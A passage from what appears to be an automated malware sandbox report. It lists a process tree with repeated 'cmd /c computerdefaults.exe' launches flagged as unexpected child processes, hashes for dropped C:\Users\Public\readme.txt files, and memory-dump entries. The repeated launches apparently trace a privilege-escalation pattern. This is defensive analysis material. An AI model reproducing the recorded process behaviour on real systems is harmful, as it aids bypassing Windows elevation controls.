cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2456
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4260

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1616
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1856

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4620
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4316

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3236
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4004

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:692
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3088

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1224
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2260

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1384
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1768

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5004
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1252

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3488
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:516

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3876
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1392

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\readme.txt

MD5
fff3040e388c77a8d3c66b16ae109be5

SHA1
316aabe5d0e5cfa71dbc0ee7a67771e881664f2f

SHA256
893d2ea9fff505ebf561493a12f03e92f3cfa7aba38afcad336657200702fb50

SHA512
4e0d109cfd186924b4dfeca11283cb26afdbe0418a2a20bd91cdc4880417b4a66990315959c2523af92bfdb46954a555f3febdb716baecb256362956532315ff

Download Submit
C:\Users\Public\readme.txt

MD5
718777534403cdcf89b5d9b5f4b2f141

SHA1
3f49f57f3c25d60fef6d5593c9eb5a69b74a7b29

SHA256
619de8a85d1beac2e0b2c9cef08f56fc70859f6f4dd0f763d2175bdac746b0cb

SHA512
8018fdbec663355db212827869eb7744f615f58db96e9a12da248f40979d28d8057bcab945381e43cb346e0b3ded14743efd8b47727ca98e32e430b6519d7440

Download Submit
C:\Users\Public\readme.txt

MD5
718777534403cdcf89b5d9b5f4b2f141

SHA1
3f49f57f3c25d60fef6d5593c9eb5a69b74a7b29

SHA256
619de8a85d1beac2e0b2c9cef08f56fc70859f6f4dd0f763d2175bdac746b0cb

SHA512
8018fdbec663355db212827869eb7744f615f58db96e9a12da248f40979d28d8057bcab945381e43cb346e0b3ded14743efd8b47727ca98e32e430b6519d7440

Download Submit
C:\Users\Public\readme.txt

MD5
718777534403cdcf89b5d9b5f4b2f141

SHA1
3f49f57f3c25d60fef6d5593c9eb5a69b74a7b29

SHA256
619de8a85d1beac2e0b2c9cef08f56fc70859f6f4dd0f763d2175bdac746b0cb

SHA512
8018fdbec663355db212827869eb7744f615f58db96e9a12da248f40979d28d8057bcab945381e43cb346e0b3ded14743efd8b47727ca98e32e430b6519d7440

Download Submit
memory/368-138-0x0000000000000000-mapping.dmp

Download
memory/432-134-0x0000000000000000-mapping.dmp

Download
memory/516-179-0x0000000000000000-mapping.dmp

Download
memory/528-137-0x0000000000000000-mapping.dmp

Download
memory/604-160-0x0000000000000000-mapping.dmp

Download
memory/648-151-0x0000000000000000-mapping.dmp

Download
memory/1228-139-0x0000000000000000-mapping.dmp

Download
memory/1236-140-0x0000000000000000-mapping.dmp

Download
memory/1252-177-0x0000000000000000-mapping.dmp

Download
memory/1392-178-0x0000000000000000-mapping.dmp

Download
memory/1436-141-0x0000000000000000-mapping.dmp

Download
memory/1768-175-0x0000000000000000-mapping.dmp

Download
memory/1856-172-0x0000000000000000-mapping.dmp

Download
memory/1860-156-0x0000000000000000-mapping.dmp

Download
memory/1888-159-0x0000000000000000-mapping.dmp

Download
memory/2260-176-0x0000000000000000-mapping.dmp

Download
memory/2268-148-0x0000000000000000-mapping.dmp

Download
memory/2284-163-0x0000000000000000-mapping.dmp

Download
memory/2476-130-0x0000023771E10000-0x0000023771E14000-memory.dmp

Filesize
16KB

Download
memory/2628-146-0x0000000000000000-mapping.dmp

Download
memory/2640-147-0x0000000000000000-mapping.dmp

Download
memory/2656-149-0x0000000000000000-mapping.dmp

Download
memory/2840-157-0x0000000000000000-mapping.dmp

Download
memory/2880-166-0x0000000000000000-mapping.dmp

Download
memory/3008-145-0x0000000000000000-mapping.dmp

Download
memory/3088-174-0x0000000000000000-mapping.dmp

Download
memory/3200-136-0x0000000000000000-mapping.dmp

Download
memory/3220-135-0x0000000000000000-mapping.dmp

Download
memory/3256-162-0x0000000000000000-mapping.dmp

Download
memory/3284-167-0x0000000000000000-mapping.dmp

Download
memory/3472-120-0x00000166A1E80000-0x00000166A1E81000-memory.dmp

Filesize
4KB

Download
memory/3472-129-0x00000166A3E20000-0x00000166A3E21000-memory.dmp

Filesize
4KB

Download
memory/3472-121-0x00000166A1E90000-0x00000166A1E91000-memory.dmp

Filesize
4KB

Download
memory/3472-169-0x00000166A4410000-0x00000166A4411000-memory.dmp

Filesize
4KB

Download
memory/3472-118-0x00000166A1D20000-0x00000166A1D26000-memory.dmp

Filesize
24KB

Download
memory/3472-123-0x00000166A3DA0000-0x00000166A3DA1000-memory.dmp

Filesize
4KB

Download
memory/3472-122-0x00000166A1EA0000-0x00000166A1EA1000-memory.dmp

Filesize
4KB

Download
memory/3472-128-0x00000166A3E10000-0x00000166A3E11000-memory.dmp

Filesize
4KB

Download
memory/3472-119-0x00000166A1E70000-0x00000166A1E71000-memory.dmp

Filesize
4KB

Download
memory/3472-124-0x00000166A3DB0000-0x00000166A3DB1000-memory.dmp

Filesize
4KB

Download
memory/3472-127-0x00000166A3E00000-0x00000166A3E01000-memory.dmp

Filesize
4KB

Download
memory/3472-126-0x00000166A3DF0000-0x00000166A3DF1000-memory.dmp

Filesize
4KB

Download
memory/3472-125-0x00000166A3DC0000-0x00000166A3DC1000-memory.dmp

Filesize
4KB

Download
memory/3640-153-0x0000000000000000-mapping.dmp

Download
memory/3780-168-0x0000000000000000-mapping.dmp

Download
memory/3868-161-0x0000000000000000-mapping.dmp

Download
memory/3988-158-0x0000000000000000-mapping.dmp

Download
memory/4004-171-0x0000000000000000-mapping.dmp

Download
memory/4260-170-0x0000000000000000-mapping.dmp

Download
memory/4272-164-0x0000000000000000-mapping.dmp

Download
memory/4316-173-0x0000000000000000-mapping.dmp

Download
memory/4444-133-0x0000000000000000-mapping.dmp

Download
memory/4512-131-0x0000000000000000-mapping.dmp

Download
memory/4572-165-0x0000000000000000-mapping.dmp

Download
memory/4672-144-0x0000000000000000-mapping.dmp

Download
memory/4988-152-0x0000000000000000-mapping.dmp

Download
memory/5036-154-0x0000000000000000-mapping.dmp

Download
memory/5088-155-0x0000000000000000-mapping.dmp

Download